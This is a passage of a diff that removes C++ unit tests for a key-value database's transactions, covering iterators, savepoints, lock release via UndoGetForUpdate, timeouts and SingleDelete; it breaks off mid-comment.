-TEST_P(TransactionTest, IteratorTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  // Write some keys to the db
-  s = db->Put(write_options, "A", "a");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "G", "g");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "F", "f");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "C", "c");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "D", "d");
-  ASSERT_OK(s);
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  // Write some keys in a txn
-  s = txn->Put("B", "b");
-  ASSERT_OK(s);
-
-  s = txn->Put("H", "h");
-  ASSERT_OK(s);
-
-  s = txn->Delete("D");
-  ASSERT_OK(s);
-
-  s = txn->Put("E", "e");
-  ASSERT_OK(s);
-
-  txn->SetSnapshot();
-  const Snapshot* snapshot = txn->GetSnapshot();
-
-  // Write some keys to the db after the snapshot
-  s = db->Put(write_options, "BB", "xx");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "C", "xx");
-  ASSERT_OK(s);
-
-  read_options.snapshot = snapshot;
-  Iterator* iter = txn->GetIterator(read_options);
-  ASSERT_OK(iter->status());
-  iter->SeekToFirst();
-
-  // Read all keys via iter and lock them all
-  std::string results[] = {"a", "b", "c", "e", "f", "g", "h"};
-  for (int i = 0; i < 7; i++) {
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(results[i], iter->value().ToString());
-
-    s = txn->GetForUpdate(read_options, iter->key(), nullptr);
-    if (i == 2) {
-      // "C" was modified after txn's snapshot
-      ASSERT_TRUE(s.IsBusy());
-    } else {
-      ASSERT_OK(s);
-    }
-
-    iter->Next();
-  }
-  ASSERT_FALSE(iter->Valid());
-
-  iter->Seek("G");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("g", iter->value().ToString());
-
-  iter->Prev();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("f", iter->value().ToString());
-
-  iter->Seek("D");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("e", iter->value().ToString());
-
-  iter->Seek("C");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("c", iter->value().ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("e", iter->value().ToString());
-
-  iter->Seek("");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("a", iter->value().ToString());
-
-  iter->Seek("X");
-  ASSERT_OK(iter->status());
-  ASSERT_FALSE(iter->Valid());
-
-  iter->SeekToLast();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("h", iter->value().ToString());
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  delete iter;
-  delete txn;
-}
-
-TEST_P(TransactionTest, DisableIndexingTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  s = txn->Put("A", "a");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a", value);
-
-  txn->DisableIndexing();
-
-  s = txn->Put("B", "b");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "B", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  Iterator* iter = txn->GetIterator(read_options);
-  ASSERT_OK(iter->status());
-
-  iter->Seek("B");
-  ASSERT_OK(iter->status());
-  ASSERT_FALSE(iter->Valid());
-
-  s = txn->Delete("A");
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a", value);
-
-  txn->EnableIndexing();
-
-  s = txn->Put("B", "bb");
-  ASSERT_OK(s);
-
-  iter->Seek("B");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("bb", iter->value().ToString());
-
-  s = txn->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("bb", value);
-
-  s = txn->Put("A", "aa");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("aa", value);
-
-  delete iter;
-  delete txn;
-}
-
-TEST_P(TransactionTest, SavepointTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  ASSERT_EQ(0, txn->GetNumPuts());
-
-  s = txn->RollbackToSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-
-  txn->SetSavePoint();  // 1
-
-  ASSERT_OK(txn->RollbackToSavePoint());  // Rollback to beginning of txn
-  s = txn->RollbackToSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Put("B", "b");
-  ASSERT_OK(s);
-
-  ASSERT_EQ(1, txn->GetNumPuts());
-  ASSERT_EQ(0, txn->GetNumDeletes());
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b", value);
-
-  delete txn;
-  txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  s = txn->Put("A", "a");
-  ASSERT_OK(s);
-
-  s = txn->Put("B", "bb");
-  ASSERT_OK(s);
-
-  s = txn->Put("C", "c");
-  ASSERT_OK(s);
-
-  txn->SetSavePoint();  // 2
-
-  s = txn->Delete("B");
-  ASSERT_OK(s);
-
-  s = txn->Put("C", "cc");
-  ASSERT_OK(s);
-
-  s = txn->Put("D", "d");
-  ASSERT_OK(s);
-
-  ASSERT_EQ(5, txn->GetNumPuts());
-  ASSERT_EQ(1, txn->GetNumDeletes());
-
-  ASSERT_OK(txn->RollbackToSavePoint());  // Rollback to 2
-
-  ASSERT_EQ(3, txn->GetNumPuts());
-  ASSERT_EQ(0, txn->GetNumDeletes());
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a", value);
-
-  s = txn->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("bb", value);
-
-  s = txn->Get(read_options, "C", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("c", value);
-
-  s = txn->Get(read_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Put("A", "a");
-  ASSERT_OK(s);
-
-  s = txn->Put("E", "e");
-  ASSERT_OK(s);
-
-  ASSERT_EQ(5, txn->GetNumPuts());
-  ASSERT_EQ(0, txn->GetNumDeletes());
-
-  // Rollback to beginning of txn
-  s = txn->RollbackToSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-  txn->Rollback();
-
-  ASSERT_EQ(0, txn->GetNumPuts());
-  ASSERT_EQ(0, txn->GetNumDeletes());
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b", value);
-
-  s = txn->Get(read_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Get(read_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Get(read_options, "E", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Put("A", "aa");
-  ASSERT_OK(s);
-
-  s = txn->Put("F", "f");
-  ASSERT_OK(s);
-
-  ASSERT_EQ(2, txn->GetNumPuts());
-  ASSERT_EQ(0, txn->GetNumDeletes());
-
-  txn->SetSavePoint();  // 3
-  txn->SetSavePoint();  // 4
-
-  s = txn->Put("G", "g");
-  ASSERT_OK(s);
-
-  s = txn->SingleDelete("F");
-  ASSERT_OK(s);
-
-  s = txn->Delete("B");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("aa", value);
-
-  s = txn->Get(read_options, "F", &value);
-  // According to db.h, doing a SingleDelete on a key that has been
-  // overwritten will have undefinied behavior.  So it is unclear what the
-  // result of fetching "F" should be. The current implementation will
-  // return NotFound in this case.
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Get(read_options, "B", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  ASSERT_EQ(3, txn->GetNumPuts());
-  ASSERT_EQ(2, txn->GetNumDeletes());
-
-  ASSERT_OK(txn->RollbackToSavePoint());  // Rollback to 3
-
-  ASSERT_EQ(2, txn->GetNumPuts());
-  ASSERT_EQ(0, txn->GetNumDeletes());
-
-  s = txn->Get(read_options, "F", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("f", value);
-
-  s = txn->Get(read_options, "G", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "F", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("f", value);
-
-  s = db->Get(read_options, "G", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = db->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("aa", value);
-
-  s = db->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b", value);
-
-  s = db->Get(read_options, "C", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = db->Get(read_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = db->Get(read_options, "E", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, SavepointTest2) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  Status s;
-
-  txn_options.lock_timeout = 1;  // 1 ms
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn1);
-
-  s = txn1->Put("A", "");
-  ASSERT_OK(s);
-
-  txn1->SetSavePoint();  // 1
-
-  s = txn1->Put("A", "a");
-  ASSERT_OK(s);
-
-  s = txn1->Put("C", "c");
-  ASSERT_OK(s);
-
-  txn1->SetSavePoint();  // 2
-
-  s = txn1->Put("A", "a");
-  ASSERT_OK(s);
-  s = txn1->Put("B", "b");
-  ASSERT_OK(s);
-
-  ASSERT_OK(txn1->RollbackToSavePoint());  // Rollback to 2
-
-  // Verify that "A" and "C" is still locked while "B" is not
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn2);
-
-  s = txn2->Put("A", "a2");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c2");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("B", "b2");
-  ASSERT_OK(s);
-
-  s = txn1->Put("A", "aa");
-  ASSERT_OK(s);
-  s = txn1->Put("B", "bb");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  s = txn1->Put("A", "aaa");
-  ASSERT_OK(s);
-  s = txn1->Put("B", "bbb");
-  ASSERT_OK(s);
-  s = txn1->Put("C", "ccc");
-  ASSERT_OK(s);
-
-  txn1->SetSavePoint();                    // 3
-  ASSERT_OK(txn1->RollbackToSavePoint());  // Rollback to 3
-
-  // Verify that "A", "B", "C" are still locked
-  txn2 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn2);
-
-  s = txn2->Put("A", "a2");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("B", "b2");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c2");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  ASSERT_OK(txn1->RollbackToSavePoint());  // Rollback to 1
-
-  // Verify that only "A" is locked
-  s = txn2->Put("A", "a3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("B", "b3");
-  ASSERT_OK(s);
-  s = txn2->Put("C", "c3po");
-  ASSERT_OK(s);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-  delete txn1;
-
-  // Verify "A" "C" "B" are no longer locked
-  s = txn2->Put("A", "a4");
-  ASSERT_OK(s);
-  s = txn2->Put("B", "b4");
-  ASSERT_OK(s);
-  s = txn2->Put("C", "c4");
-  ASSERT_OK(s);
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-}
-
-TEST_P(TransactionTest, UndoGetForUpdateTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  txn_options.lock_timeout = 1;  // 1 ms
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn1);
-
-  txn1->UndoGetForUpdate("A");
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-  delete txn1;
-
-  txn1 = db->BeginTransaction(write_options, txn_options);
-
-  txn1->UndoGetForUpdate("A");
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  // Verify that A is locked
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  s = txn2->Put("A", "a");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  txn1->UndoGetForUpdate("A");
-
-  // Verify that A is now unlocked
-  s = txn2->Put("A", "a2");
-  ASSERT_OK(s);
-  txn2->Commit();
-  delete txn2;
-  s = db->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a2", value);
-
-  s = txn1->Delete("A");
-  ASSERT_OK(s);
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn1->Put("B", "b3");
-  ASSERT_OK(s);
-  s = txn1->GetForUpdate(read_options, "B", &value);
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-  txn1->UndoGetForUpdate("B");
-
-  // Verify that A and B are still locked
-  txn2 = db->BeginTransaction(write_options, txn_options);
-  s = txn2->Put("A", "a4");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("B", "b4");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  txn1->Rollback();
-  delete txn1;
-
-  // Verify that A and B are no longer locked
-  s = txn2->Put("A", "a5");
-  ASSERT_OK(s);
-  s = txn2->Put("B", "b5");
-  ASSERT_OK(s);
-  s = txn2->Commit();
-  delete txn2;
-  ASSERT_OK(s);
-
-  txn1 = db->BeginTransaction(write_options, txn_options);
-
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-  s = txn1->GetForUpdate(read_options, "C", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-  s = txn1->GetForUpdate(read_options, "C", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = txn1->GetForUpdate(read_options, "B", &value);
-  ASSERT_OK(s);
-  s = txn1->Put("B", "b5");
-  s = txn1->GetForUpdate(read_options, "B", &value);
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-  txn1->UndoGetForUpdate("B");
-  txn1->UndoGetForUpdate("C");
-  txn1->UndoGetForUpdate("X");
-
-  // Verify A,B,C are locked
-  txn2 = db->BeginTransaction(write_options, txn_options);
-  s = txn2->Put("A", "a6");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Delete("B");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c6");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("X", "x6");
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-  txn1->UndoGetForUpdate("B");
-  txn1->UndoGetForUpdate("C");
-  txn1->UndoGetForUpdate("X");
-
-  // Verify A,B are locked and C is not
-  s = txn2->Put("A", "a6");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Delete("B");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c6");
-  ASSERT_OK(s);
-  s = txn2->Put("X", "x6");
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-  txn1->UndoGetForUpdate("B");
-  txn1->UndoGetForUpdate("C");
-  txn1->UndoGetForUpdate("X");
-
-  // Verify B is locked and A and C are not
-  s = txn2->Put("A", "a7");
-  ASSERT_OK(s);
-  s = txn2->Delete("B");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c7");
-  ASSERT_OK(s);
-  s = txn2->Put("X", "x7");
-  ASSERT_OK(s);
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-  delete txn1;
-}
-
-TEST_P(TransactionTest, UndoGetForUpdateTest2) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  s = db->Put(write_options, "A", "");
-  ASSERT_OK(s);
-
-  txn_options.lock_timeout = 1;  // 1 ms
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn1);
-
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-  s = txn1->GetForUpdate(read_options, "B", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn1->Put("F", "f");
-  ASSERT_OK(s);
-
-  txn1->SetSavePoint();  // 1
-
-  txn1->UndoGetForUpdate("A");
-
-  s = txn1->GetForUpdate(read_options, "C", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = txn1->GetForUpdate(read_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn1->Put("E", "e");
-  ASSERT_OK(s);
-  s = txn1->GetForUpdate(read_options, "E", &value);
-  ASSERT_OK(s);
-
-  s = txn1->GetForUpdate(read_options, "F", &value);
-  ASSERT_OK(s);
-
-  // Verify A,B,C,D,E,F are still locked
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  s = txn2->Put("A", "a1");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("B", "b1");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c1");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("D", "d1");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("E", "e1");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("F", "f1");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  txn1->UndoGetForUpdate("C");
-  txn1->UndoGetForUpdate("E");
-
-  // Verify A,B,D,E,F are still locked and C is not.
-  s = txn2->Put("A", "a2");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("B", "b2");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("D", "d2");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("E", "e2");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("F", "f2");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c2");
-  ASSERT_OK(s);
-
-  txn1->SetSavePoint();  // 2
-
-  s = txn1->Put("H", "h");
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-  txn1->UndoGetForUpdate("B");
-  txn1->UndoGetForUpdate("C");
-  txn1->UndoGetForUpdate("D");
-  txn1->UndoGetForUpdate("E");
-  txn1->UndoGetForUpdate("F");
-  txn1->UndoGetForUpdate("G");
-  txn1->UndoGetForUpdate("H");
-
-  // Verify A,B,D,E,F,H are still locked and C,G are not.
-  s = txn2->Put("A", "a3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("B", "b3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("D", "d3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("E", "e3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("F", "f3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("H", "h3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c3");
-  ASSERT_OK(s);
-  s = txn2->Put("G", "g3");
-  ASSERT_OK(s);
-
-  txn1->RollbackToSavePoint();  // rollback to 2
-
-  // Verify A,B,D,E,F are still locked and C,G,H are not.
-  s = txn2->Put("A", "a3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("B", "b3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("D", "d3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("E", "e3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("F", "f3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c3");
-  ASSERT_OK(s);
-  s = txn2->Put("G", "g3");
-  ASSERT_OK(s);
-  s = txn2->Put("H", "h3");
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-  txn1->UndoGetForUpdate("B");
-  txn1->UndoGetForUpdate("C");
-  txn1->UndoGetForUpdate("D");
-  txn1->UndoGetForUpdate("E");
-  txn1->UndoGetForUpdate("F");
-  txn1->UndoGetForUpdate("G");
-  txn1->UndoGetForUpdate("H");
-
-  // Verify A,B,E,F are still locked and C,D,G,H are not.
-  s = txn2->Put("A", "a3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("B", "b3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("E", "e3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("F", "f3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c3");
-  ASSERT_OK(s);
-  s = txn2->Put("D", "d3");
-  ASSERT_OK(s);
-  s = txn2->Put("G", "g3");
-  ASSERT_OK(s);
-  s = txn2->Put("H", "h3");
-  ASSERT_OK(s);
-
-  txn1->RollbackToSavePoint();  // rollback to 1
-
-  // Verify A,B,F are still locked and C,D,E,G,H are not.
-  s = txn2->Put("A", "a3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("B", "b3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("F", "f3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c3");
-  ASSERT_OK(s);
-  s = txn2->Put("D", "d3");
-  ASSERT_OK(s);
-  s = txn2->Put("E", "e3");
-  ASSERT_OK(s);
-  s = txn2->Put("G", "g3");
-  ASSERT_OK(s);
-  s = txn2->Put("H", "h3");
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-  txn1->UndoGetForUpdate("B");
-  txn1->UndoGetForUpdate("C");
-  txn1->UndoGetForUpdate("D");
-  txn1->UndoGetForUpdate("E");
-  txn1->UndoGetForUpdate("F");
-  txn1->UndoGetForUpdate("G");
-  txn1->UndoGetForUpdate("H");
-
-  // Verify F is still locked and A,B,C,D,E,G,H are not.
-  s = txn2->Put("F", "f3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("A", "a3");
-  ASSERT_OK(s);
-  s = txn2->Put("B", "b3");
-  ASSERT_OK(s);
-  s = txn2->Put("C", "c3");
-  ASSERT_OK(s);
-  s = txn2->Put("D", "d3");
-  ASSERT_OK(s);
-  s = txn2->Put("E", "e3");
-  ASSERT_OK(s);
-  s = txn2->Put("G", "g3");
-  ASSERT_OK(s);
-  s = txn2->Put("H", "h3");
-  ASSERT_OK(s);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  delete txn1;
-  delete txn2;
-}
-
-TEST_P(TransactionTest, TimeoutTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  delete db;
-  db = nullptr;
-
-  // transaction writes have an infinite timeout,
-  // but we will override this when we start a txn
-  // db writes have infinite timeout
-  txn_db_options.transaction_lock_timeout = -1;
-  txn_db_options.default_lock_timeout = -1;
-
-  s = TransactionDB::Open(options, txn_db_options, dbname, &db);
-  assert(db != nullptr);
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "aaa", "aaa");
-  ASSERT_OK(s);
-
-  TransactionOptions txn_options0;
-  txn_options0.expiration = 100;  // 100ms
-  txn_options0.lock_timeout = 50;  // txn timeout no longer infinite
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options0);
-
-  s = txn1->GetForUpdate(read_options, "aaa", nullptr);
-  ASSERT_OK(s);
-
-  // Conflicts with previous GetForUpdate.
-  // Since db writes do not have a timeout, this should eventually succeed when
-  // the transaction expires.
-  s = db->Put(write_options, "aaa", "xxx");
-  ASSERT_OK(s);
-
-  ASSERT_GE(txn1->GetElapsedTime(),
-            static_cast<uint64_t>(txn_options0.expiration));
-
-  s = txn1->Commit();
-  ASSERT_TRUE(s.IsExpired());  // expired!
-
-  s = db->Get(read_options, "aaa", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("xxx", value);
-
-  delete txn1;
-  delete db;
-
-  // transaction writes have 10ms timeout,
-  // db writes have infinite timeout
-  txn_db_options.transaction_lock_timeout = 50;
-  txn_db_options.default_lock_timeout = -1;
-
-  s = TransactionDB::Open(options, txn_db_options, dbname, &db);
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "aaa", "aaa");
-  ASSERT_OK(s);
-
-  TransactionOptions txn_options;
-  txn_options.expiration = 100;  // 100ms
-  txn1 = db->BeginTransaction(write_options, txn_options);
-
-  s = txn1->GetForUpdate(read_options, "aaa", nullptr);
-  ASSERT_OK(s);
-
-  // Conflicts with previous GetForUpdate.
-  // Since db writes do not have a timeout, this should eventually succeed when
-  // the transaction expires.
-  s = db->Put(write_options, "aaa", "xxx");
-  ASSERT_OK(s);
-
-  s = txn1->Commit();
-  ASSERT_NOK(s);  // expired!
-
-  s = db->Get(read_options, "aaa", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("xxx", value);
-
-  delete txn1;
-  txn_options.expiration = 6000000;  // 100 minutes
-  txn_options.lock_timeout = 1;      // 1ms
-  txn1 = db->BeginTransaction(write_options, txn_options);
-  txn1->SetLockTimeout(100);
-
-  TransactionOptions txn_options2;
-  txn_options2.expiration = 10;  // 10ms
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options2);
-  ASSERT_OK(s);
-
-  s = txn2->Put("a", "2");
-  ASSERT_OK(s);
-
-  // txn1 has a lock timeout longer than txn2's expiration, so it will win
-  s = txn1->Delete("a");
-  ASSERT_OK(s);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  // txn2 should be expired out since txn1 waiting until its timeout expired.
-  s = txn2->Commit();
-  ASSERT_TRUE(s.IsExpired());
-
-  delete txn1;
-  delete txn2;
-  txn_options.expiration = 6000000;  // 100 minutes
-  txn1 = db->BeginTransaction(write_options, txn_options);
-  txn_options2.expiration = 100000000;
-  txn2 = db->BeginTransaction(write_options, txn_options2);
-
-  s = txn1->Delete("asdf");
-  ASSERT_OK(s);
-
-  // txn2 has a smaller lock timeout than txn1's expiration, so it will time out
-  s = txn2->Delete("asdf");
-  ASSERT_TRUE(s.IsTimedOut());
-  ASSERT_EQ(s.ToString(), "Operation timed out: Timeout waiting to lock key");
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = txn2->Put("asdf", "asdf");
-  ASSERT_OK(s);
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "asdf", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("asdf", value);
-
-  delete txn1;
-  delete txn2;
-}
-
-TEST_P(TransactionTest, SingleDeleteTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  s = txn->SingleDelete("A");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-  delete txn;
-
-  txn = db->BeginTransaction(write_options);
-
-  s = txn->SingleDelete("A");
-  ASSERT_OK(s);
-
-  s = txn->Put("A", "a");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a", value);
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-  delete txn;
-
-  s = db->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a", value);
-
-  txn = db->BeginTransaction(write_options);
-
-  s = txn->SingleDelete("A");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-  delete txn;
-
-  s = db->Get(read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  txn = db->BeginTransaction(write_options);
-  Transaction* txn2 = db->BeginTransaction(write_options);
-  txn2->SetSnapshot();
-
-  s = txn->Put("A", "a");
-  ASSERT_OK(s);
-
-  s = txn->Put("A", "a2");
-  ASSERT_OK(s);
-
-  s = txn->SingleDelete("A");
-  ASSERT_OK(s);
-
-  s = txn->SingleDelete("B");
-  ASSERT_OK(s);
-
-  // According to db.h, doing a SingleDelete on a key that has been
